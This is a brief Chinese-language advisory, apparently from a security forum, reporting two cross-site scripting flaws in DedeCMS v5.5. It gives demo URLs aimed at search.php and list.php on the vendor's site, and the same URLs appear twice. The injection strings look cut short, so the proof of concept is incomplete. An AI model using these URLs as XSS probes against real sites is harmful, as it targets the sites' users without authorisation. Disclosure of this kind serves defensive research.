dedecms织梦 v5.5 两处跨站漏洞
<p> 影响版本:</p> <p> dedecms织梦5.5</p> <p> 漏洞描述:</p> <p> demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2</p> <p> 测试方法:</p> <p> 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!</p> <p> demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2</p> <p> </p>
頁:
[1]